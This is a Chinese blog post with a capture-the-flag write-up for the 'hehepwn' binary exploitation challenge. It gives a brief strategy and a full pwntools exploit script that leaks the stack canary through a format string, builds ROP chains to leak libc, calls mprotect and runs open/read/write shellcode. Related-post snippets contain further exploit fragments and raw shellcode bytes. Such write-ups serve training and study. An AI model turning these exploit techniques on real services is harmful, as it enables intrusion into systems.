2021 DASCTF Sept X 浙江工业大学秋季挑战赛 pwn hehepwn

最新推荐文章于 2021-10-17 11:42:43 发布
最新推荐文章于 2021-10-17 11:42:43 发布
阅读量387 收藏
点赞数 1
分类专栏: CTF 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/120477155
版权

在这里插入图片描述
利用格式化字符串泄露canary再ret2libc就可以了。
开了沙箱,可以先mprotect一下,再用shellcode来orw。

exp

from pwn import*

context.log_level='debug'
context.arch='amd64'
context.os = "linux"
context.terminal = ["tmux", "splitw", "-h"] 

local = 1
if local:
    r = process('./1111111')
else:
    r = remote("node4.buuoj.cn", 25963)
    
#libc = ELF("/home/wuangwuang/glibc-all-in-one-master/glibc-all-in-one-master/libs/2.27-3ubuntu1.2_amd64/libc.so.6")
#libc = ELF("/home/wuangwuang/glibc-all-in-one-master/glibc-all-in-one-master/libs/2.23-0ubuntu11.2_amd64/libc.so.6")
libc = ELF("./libc.so.6")

sa = lambda s,n : r.sendafter(s,n)
sla = lambda s,n : r.sendlineafter(s,n)
sl = lambda s : r.sendline(s)
sd = lambda s : r.send(s)
rc = lambda n : r.recv(n)
ru = lambda s : r.recvuntil(s)
ti = lambda: r.interactive()
lg = lambda name,addr :log.success(name+":"+hex(addr))

def debug():
    gdb.attach(r)
    pause()

elf = ELF("./1111111")
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main_addr = 0x4007b8
pop_rdi = 0x400943
bss_addr = 0x601080

sla("Welcome! What is your name?\n", "%27$p")
ru("0x")
canary = int(rc(16), 16)
lg("canary", canary)

payload = "a" * 0x68 + p64(canary) + p64(0)
payload += p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main_addr)

sla("What can we help you?\n", payload)
libc_base = u64(ru("\x7f")[-6:] + '\x00\x00') - libc.sym['puts']
system_addr = libc_base + libc.sym['system']
open_addr = libc_base + libc.sym['open']
bin_sh = libc_base + libc.search("/bin/sh").next()
mprotect_addr = libc_base + libc.sym['mprotect']
gets_addr = libc_base + libc.sym['gets']
read_addr = libc_base + libc.sym['read']
puts_addr = libc_base + libc.sym['puts']
pop_rax = libc_base + 0x3a738
pop_rdx = libc_base + 0x1b92
pop_rsi = libc_base + 0x202f8
lg("libc_base", libc_base)
lg("system_addr", system_addr)
lg("gets_addr", gets_addr)
#debug()


sla("Welcome! What is your name?\n", "Yongibaoi")

payload = "a" * 0x68 + p64(canary) + p64(0)
payload += p64(pop_rdi) + p64(bss_addr & 0xfffffffffffff000) + p64(pop_rsi) + p64(0x1000) + p64(pop_rdx) + p64(7)
payload += p64(mprotect_addr)
payload += p64(pop_rdi) + p64(0) + p64(pop_rsi) + p64(bss_addr) + p64(pop_rdx) + p64(0x100)
payload += p64(read_addr)
payload += p64(bss_addr)
sla("What can we help you?\n", payload)

sleep(1)

shellcode = shellcraft.open('flag')
shellcode += shellcraft.read(3,bss_addr + 0x100,100)
shellcode += shellcraft.write(1,bss_addr + 0x100,100)
shellcode = asm(shellcode)
sl(shellcode)

r.interactive()
yongbaoii
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2021dasctf七月赛 pwn题解复现(strdup,md5,protect,setcontext)
weixin_46521144的博客
08-09 879
前言:算是第一次参加自己觉得能力匹配的比赛之前的0ctf,tctf的,感觉自己就像个混子,2021国赛参加的时候全程都在学没学过的堆,所以其实也没觉得自己能力赶得上。然而第一次打比赛嘛,总归是不可能会做的,不过也算是知道了,比赛也没有想象中的那么恐怖。 本篇文章参考的wp https://kr0emer.com/2021/08/04/DASCTF%20July%20X%20CBCTF%204th%20pwn/ Easyheap 保护全开,也开了沙箱,但是同时也开了一块RWX的段,地址是固定的0x233300
SCU新生赛2021 pwn wp
N1rvana的博客
11-29 4241
前段时间的极客大挑战20212021年的SCU新生赛,最后一道题都没有做出来,作为一枚大二学长确实应该反省一下自己了。太菜了呜呜呜。极客大挑战因为打太久了,题目都快忘记了,就不写wp了。 ret2text 简单的栈溢出,pwn里的hello world。 from pwn import * r = process("/mnt/hgfs/ubuntu/stackoverflow") elf = ELF("/mnt/hgfs/ubuntu/stackoverflow") payload = b'a'*0x3
ciscn2021初赛pwn部分wp
eeeeeight的博客
05-17 1129
ciscn2021初赛 感谢wepn的队友 Column: May 17, 2021 pwny: 首先ida看一眼发现read文件描述符全是3, 好像是读个随机数, 然后我们在3的地址上连着用Write读两次就可以把他变成0, 就可以写入内存了, 后面就是数组越界写, 负数可以往前面读读出libc偏移和pie偏移, 在得到libc之后可以获得环境变量environ的地址, 之后通过(libc_base+libc.sym[‘environ’]-pie_base-0x202060)/8, 就可以得到其位置是数组
强网杯2021CTF 强网先锋shellcode侧信道攻击复现
qq_39948058的博客
08-27 1241
前言:由于个别原因这个比赛忘记参加了,所以赛后挑选了一道测信道攻击的题来进行复现,这个题开启了沙盒,采用测信道爆破flag,大概思路:使用retf切换到32位open来进行open('./flag'),retfq再回到64位的write和read就可以了,此题禁用了open所以使用32位的open,如果禁用了write就使用32位的write,同理,具体代码分析,懂汇编就能看懂这里就不赘述了,参考了别的大佬的exp,大概就是这样写的,至于系统调用号可以参考前篇调用号文章 exp: from pwn i
2021 强网杯 [强网先锋] shellcode
yongbaoii的博客
06-23 969
就是写入shellcode跑就行。但是shellcode不能有小于’\x1f’,也不能有等于‘\x7f’。问题的关键在于开了沙箱。 只能使用这些系统调用。
TCG_PCClient_PP_1p3_for_Library_1p59_pub_29sept2021.pdf
07-21
TPM 相关技术规范
Visual Assist X_10.9.2237.0
10-31
Windows 10 Build 15063.608, issued Sept 12th, broke a hook mechanism. Windows Version 1709 (Fall Creators Update), released Oct 17th, broke also CreateWindow(). Microsoft is actively seeking ...
microtca_short_form_sept_2006
07-20
microtca_short_form_sept_2006
工业必须掌握英文简写读写
11-12
FAT factory acceptance test 工厂验收测试 əkˈseptəns SAT site acceptance test 站点验收测试 sait DQR design qualification report 设计确认报告 ri'kɔ:d IQR installation qualification record 安装确认...
Sept8Exercises
05-10
#csc462UML 2015年9月3日,用于课堂作业的起始代码存储库。 目标是让班级克隆存储库,并通过导入3个班级练习的项目来用作本地蚀工作区进行分析。 删除不需要的软件包。 将JUnit测试添加到edu.elon.test包中的ATM...
2021第十四届全国大学生信息安全竞赛WP(CISCN)-- pwn部分
热门推荐
lifanxin的博客
05-17 1万+
CISCN_2021_WP概述ciscn_2021_lonelywolf总结 概述   作为学习不到一年的练习生,今年第一次参加国赛,本以为题目会比较温柔,但是最后只做出了一道pwn题,本来还有两道pwn题是有机会的,但还是缺少一些知识或者技巧吧,没做出来,然后就结束了。本次国赛pwn题出了一道arm 64位结构的,其余都是正常的linux下pwn题,使用libc-2.27.so,有一道考了沙箱机制。 ciscn_2021_lonelywolf   ciscn_2021_lonelywolf   libc-
pwn题shellcode收集
lifanxin的博客
02-25 4500
Write Upshellcode shellcode 这里对pwn中使用到的shellcode做了一个汇总,方便大家参考和使用。 # 32位 短字节shellcode --> 21字节 \x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80 # 32位 纯ascii字符shellcode PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0
DASCTF Sept X 浙江工业大学秋季挑战赛 部分wp
Airwooh的博客
09-25 1595
排名28,还是太菜了,web就出了一道,eur1ka yyds MISC Girlfriend’s account import re import xlrd data=xlrd.open_workbook("D:\webtest\information.xls") table = data.sheets()[0] nrows = table.nrows price=table.col_values(0, start_rowx=1, end_rowx=5001) number=table.col.
DASCTF Sept X 浙江工业大学秋季挑战赛 writeup
09-26 2617
crypto-welcome 签到 已知n、m、c 求e,sage脚本 m = 73964803637492582853353338913523546944627084372081477892312545091623069227301 c = 21572244511100216966799370397791432119463715616349800194229377843045443048821 n = 2 ** 256 e=discrete_log(c,mod(m,n)) print(e) #348528
python xlrd对excel文件的读取
xu19950525的博客
10-09 539
XLRD库主要是对文件进行读取,写文件一般用xlwt库,该库遵循 ”读取修改覆盖“ 的原则。 import xlrd # 打开文件 workbook = xlrd.open_workbook('C:/Users/Administrator/Desktop/s4.xlsx') sheet2_name = workbook.sheet_names() # 获取所有sheet名称 prin...
2021 DASCTF Sept X 浙江工业大学秋季挑战赛 pwn hahapwn
yongbaoii的博客
09-27 235
有个strdup要注意一下。 有溢出。 通过strdup泄露栈地址,栈上布置shellcode,跳过去就好啦 exp from pwn import* context.log_level='debug' context.arch='amd64' context.os = "linux" context.terminal = ["tmux", "splitw", "-h"] local = 1 if local: r = process('./1111111') else: r = re
2021 DASCTF八月挑战赛
weixin_43610673的博客
08-30 2607
babypython[国赛总决赛复现] 看着像是[HCTF 2018]Hide and seek 这题改的,和[CISCN2019 华东南赛区]Web4的加密SECRET_KEY的方式也一样 进去提示要变admin,想到session伪造,直接jwt.io伪造不了,需要SECRET_KEY。上传文件只能为zip ,软链接zip 读取文件。 ln -s /etc/passwd passwd zip --symlinks passwd.zip passwd 读取/proc/self/environ提示bad
DASCTF Sept X 浙江工业大学秋季挑战赛
zylxixixi的博客
10-17 374
hehepwn 首先check一下安全防护机制,全红。 分析程序,程序逻辑非常简单。 思路首先通过strdup泄露栈地址,后面控制返回地址到栈上,执行shellcode。 from pwn import * sh = process('./bypwn') context(os='linux',arch='amd64',log_level='DEBUG') #sh = remote('node4.buuoj.cn',25111) pop_rdi = 0x000000000040092..
2021DASCTF July X CBCTF pwn wp
qq_39948058的博客
08-26 281
此题是7月末的比赛,本人旧博客搬到新博客啦,各位见谅哈(实际就是没钱租用服务器啦呜呜) **EasyHeap wp: Edit有堆溢出,有沙箱,禁用了execute,freehook为setcontext+5361即可,尝试orw就行了。写shellcode到hook,赋予权限即可,** exp: from pwn import * context(os='linux',arch='amd64',log_level='debug') p=process('./Easyheap') p=rem
r语言中paste(la," ",pct,"%",sept="")各参数的意义
最新发布
08-17
在你提供的例子中,paste(la," ",pct,"%",sept="")的各参数的意义如下: - la: 这是一个字符向量或者一个对象,表示需要连接的第一个对象。 - " ": 这是一个字符串,表示需要添加到连接对象之间的分隔符。在这个...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值